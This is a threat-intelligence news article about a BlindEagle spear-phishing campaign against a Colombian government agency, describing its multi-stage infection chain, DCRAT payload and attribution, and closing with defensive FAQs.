BlindEagle uses compromised government inboxes to bypass email security

The campaign relied on internal trust and multi-stage malware delivery to reach targets in Colombia.

What happened

According to Cyber Press, a spear phishing campaign attributed to the BlindEagle threat actor that began in early September 2025 and targeted a Colombian government agency under the Ministry of Commerce, Industry, and Tourism. The attackers sent phishing emails from compromised internal accounts, allowing the messages to bypass Microsoft 365 email authentication checks and appear legitimate to recipients.

Going deeper

The phishing message posed as an official legal notice related to a labor lawsuit and prompted the recipient to acknowledge receipt. An attached SVG file decoded a Base64-embedded HTML page that imitated the Colombian judicial branch website. That page triggered the download of a JavaScript file that launched a multi stage chain using nested JavaScript and PowerShell. Investigators said the scripts were heavily obfuscated and executed fileless commands through Windows Management Instrumentation. The chain ultimately retrieved an image from the Internet Archive that concealed a Base64 payload. That payload loaded a .NET downloader known as Caminho, which then fetched an additional encoded file from Discord and injected a remote access trojan into MSBuild.exe using process hollowing.

What was said

Researchers said the final payload was a customized variant of DCRAT that supported keylogging, file access, and persistence through scheduled tasks or registry changes. They observed the use of AES 256 encryption and certificate-based command and control authentication, which is less common in commodity tooling. The activity was linked to BlindEagle with medium confidence based on infrastructure reuse, Dynamic DNS services, Portuguese language artifacts in the loader, and a long-standing focus on Colombian organizations.

In the know

BlindEagle, also tracked as APT-C-36, is a long-running threat group that has been active since at least 2018 and is known for targeting organizations across Colombia and the wider Latin American region. Security teams have consistently linked the group to campaigns against government agencies, financial institutions, and main infrastructure, where access to internal systems can support both espionage and financially motivated activity.

The group is best known for its heavy reliance on social engineering and phishing rather than novel malware. BlindEagle commonly uses malicious attachments and documents that appear to be trusted to gain initial access, then deploys widely available remote access tools such as Remcos and DCRAT. Researchers have noted that the group regularly adapts its delivery methods, using obfuscation, fileless execution, and abuse of legitimate services to blend into normal enterprise activity and prolong access once an inbox or endpoint is compromised.

FAQs

Why do attackers use compromised internal email accounts?

Messages sent from within the same organization inherit trust and can bypass authentication checks, making them harder to block and more convincing to recipients.

What part did the SVG attachment play?

The SVG acted as a container for encoded content that decoded into a fake web page, which then initiated the malware download sequence.

Why hide malware inside image files?

Steganography helps attackers avoid signature-based detection by concealing payloads within files that appear harmless.

What makes DCRAT a persistent threat?

DCRAT supports multiple persistence methods and allows attackers to monitor activity, steal data, and maintain access over time.

How can organizations reduce risk from similar campaigns?

They can restrict internal account compromise through strong authentication, monitor anomalous email behavior, block script execution from email attachments, and train staff to verify unexpected internal messages.